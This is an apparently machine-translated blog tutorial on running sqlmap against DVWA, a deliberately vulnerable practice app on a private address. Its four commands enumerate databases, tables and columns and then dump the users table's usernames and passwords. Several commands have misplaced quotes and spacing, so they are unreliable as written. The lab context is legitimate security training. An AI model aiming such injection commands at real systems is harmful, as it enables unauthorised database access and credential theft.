Sqlmap sql injection test conducted on dvwa

Premise preparation conditions:

1. Download and install dvwa, download link address: http: //www.dvwa.co.uk/.
2. The need to install the python runtime environment.
3. Download sqlmap pack and unpack it.


A check all databases; (dbs shows a display where all databases)
SqlMap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "Security = Impossible ; PHPSESSID = paak4uv1ob93v4ptkult39b6p5 "--batch --dbs

 

 


Second, view the data in all tables :( -D dvwa which is selected database dvwa)

sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch -D dvwa --tables

 

 

 


Third, the data in the table in :( which -T users to select the data table users)

sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch -D dvwa -T users --columns

 

 

 


Fourth, view the table in the user table of user names and passwords
sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security = impossible; PHPSESSID = paak4uv1ob93v4ptkult39b6p5 "--batch -D dvwa -T users -C " user, password "--dump

 

Guess you like

Origin www.cnblogs.com/wangyuebo/p/11431245.html